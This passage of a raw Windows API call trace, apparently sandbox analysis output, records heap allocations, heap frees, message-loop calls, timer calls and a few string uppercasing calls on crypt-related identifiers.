RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0237.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e80330 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0237.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0237.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0237.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0237.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0237.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0237.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e8d9a0 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0237.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0237.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0237.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0237.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0237.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0237.960] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0237.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0237.961] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0237.961] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0237.961] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0237.961] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0237.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0237.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0237.962] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0237.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.962] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0237.962] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0237.963] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0237.963] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0237.963] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0237.963] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0237.963] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.963] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e80330 [0237.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0237.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e9b010 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0237.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e80330 [0237.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9b010 | out: hHeap=0x970000) returned 1 [0237.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0237.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0237.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e9b010 [0237.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0237.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0237.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3cb68 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0237.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0237.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0237.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0237.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2f4f8 | out: hHeap=0x970000) returned 1 [0237.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0237.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0237.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8d9a0 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0237.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0237.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0237.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f21e88 | out: hHeap=0x970000) returned 1 [0238.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0238.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0238.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd668) returned 0x2e80330 [0238.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e9b010 | out: hHeap=0x970000) returned 1 [0238.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0238.014] TranslateMessage (lpMsg=0x8cf708) returned 0 [0238.014] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0238.014] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0238.014] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0238.014] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0238.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0238.014] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0238.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0238.015] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0238.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0238.015] RtlAllocateHeap 